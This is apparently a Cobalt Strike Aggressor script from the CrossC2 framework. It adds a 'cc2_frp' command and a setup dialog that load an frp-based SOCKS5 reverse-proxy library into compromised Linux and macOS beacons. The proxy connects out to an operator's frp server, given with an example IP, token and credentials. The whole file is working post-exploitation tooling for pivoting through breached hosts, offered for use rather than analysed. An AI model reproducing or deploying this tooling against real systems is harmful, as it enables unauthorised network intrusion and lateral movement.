
# include(script_resource("CrossC2Kit.cna"));

sub printUsage_frp {
    blog($1, "\nCrossC2 proxy frp -  Start SOCKS5 {TCP/KCP(UDP)}\nby: daybr4ak\nUsage: cc2_frp <linux(32)/osx> <sip:sport> <token> <protocol> <user:pass:rport>\n\n\tsip: \tfrp server ip\n\tsport: \tfrp server port\n\ttoken: \tfrp token\n\tprotocol: \ttcp / kcp\n\tuser: \tsocks5 username\n\tpass: \tsocks5 password\n\trport: \tsocks5 port\nEx:\n\tcc2_frp linux 112.12.11.12:8000 token1234 tcp admin:passwd:8001");
}

sub cc2_frp {
    local('$taskName $taskType $taskResType');
    local('$bid $arch $server_host $token $protocol $bindInfo $transportArg');
    local('$loadlib $t_host $t_user $t_pwd $t_port');
    $taskName = "cc2_frp"; # taskName
    $taskType = "so";  # $taskType -> ELF, MachO, so, dylib
    $taskResType = "info"; # info -> normal message

    $bid = $1;
    $arch = $2;
    $server_host = $3;
    $token = $4;
    $protocol = $5;
    $bindInfo = $6;
    $transportArg = $server_host . "^" . $token . "^" . $protocol . "^" . $bindInfo;

    if ($arch eq "osx") {
        $loadlib = "proxy/frp/crossc2_frp.dylib";
    } else if ($arch eq "linux32") {
        $loadlib = "proxy/frp/crossc2_frp32.so";
    } else if ($arch eq "linux") {
        $loadlib = "proxy/frp/crossc2_frp.so";
    } else {
        berror($bid, "*[error]: system");
        printUsage_frp($bid);
        return;
    }
    if ($server_host && $token && $protocol && $bindInfo) {
        ($t_host, $_) = split(":", $server_host);
        ($t_user, $t_pwd, $t_port) = split(":", $bindInfo);
        blog($bid, "s5(server\[$protocol\]) $t_host\:$t_port $t_user\:$t_pwd");
        bcrossc2_load_dyn($bid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        printUsage_frp($bid);
    }

}

ssh_alias("cc2_frp", &cc2_frp);

ssh_command_register("cc2_frp", "CrossC2 proxy frp  -  Start Linux/MacOS SOCKS5 proxy {TCP/KCP(UDP)}", "\nby: daybr4ak\nUsage: cc2_frp <linux(32)/osx> <sip:sport> <token> <protocol> <user:pass:rport>\n\n\tsip: \tfrp server ip\n\tsport: \tfrp server port\n\ttoken: \tfrp token\n\tprotocol: \ttcp / kcp\n\tuser: \tsocks5 username\n\tpass: \tsocks5 password\n\trport: \tsocks5 port\nEx:\n\tcc2_frp linux 112.12.11.12:8000 token1234 tcp admin:passwd:8001");


sub openProxyDialogCallBack {
    local('$bid $f_server_lh $f_server_lp $f_token $protocol $s5_username $s5_password $s5_port');
    local('$os $arch $system');
    $bid = $3['bid'];
    $f_server_lh = $3['f_server_lh'];
    $f_server_lp = $3['f_server_lp'];
    $f_token = $3['f_token'];
    $protocol = $3['protocol'];
    $s5_username = $3['s5_username'];
    $s5_password = $3['s5_password'];
    $s5_port = $3['s5_port'];

    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    $system = "";
    if ('linux' isin $os) {
        if ($arch eq 'x86') {
            $system = "linux32";
        } else if ($arch eq 'x64') {
            $system = "linux";
        }
    } else if ('macos' isin $os) {
        $system = "osx";
    }
    binput($bid, "cc2_frp $system $f_server_lh\:$f_server_lp $f_token $protocol $s5_username\:$s5_password\:$s5_port");
    blog($bid, "proxy (server\[$protocol\], client\[$system\]) \: $f_server_lh\:$s5_port $s5_username / $s5_password");
    cc2_frp($bid, $system, $f_server_lh.':'.$f_server_lp, $f_token, $protocol, $s5_username.':'.$s5_password.':'.$s5_port);
}

sub openProxyDialog {
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("proxy s5", %(bid => $bid[0], f_server_lh => "x.x.x.x", f_server_lp => "4444", f_token => "frp-server-token", protocol => "tcp", s5_username => "admin", s5_password => "password", s5_port => "8080"), &openProxyDialogCallBack);
    dialog_description($dialog, "setup frp proxy");

    drow_text($dialog, "f_server_lh", "frp listening host: ", 20); 
    drow_text($dialog, "f_server_lp", "frp listening port: ", 20);
    drow_text($dialog, "f_token", "frp listening token: ", 20);
    drow_combobox($dialog, "protocol", "Type: ", @("tcp", "udp"));
    drow_text($dialog, "s5_username", "socks5 username: ");
    drow_text($dialog, "s5_password", "socks5 password: ");
    drow_text($dialog, "s5_port", "socks5 port: ");

    dbutton_action($dialog, "run");
    dialog_show($dialog);
}


sub cc2_frp_status {
    local('$bid $os $arch $system');
    $bid = $1;
    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    if ('linux' isin $os) {
        if ($arch eq 'x86') {
            return '';
        } else if ($arch eq 'x64') {
            return 'Linux64';
        }
    } else if ('macos' isin $os) {
        return 'MacOS(intel)';
    }
    return '';
}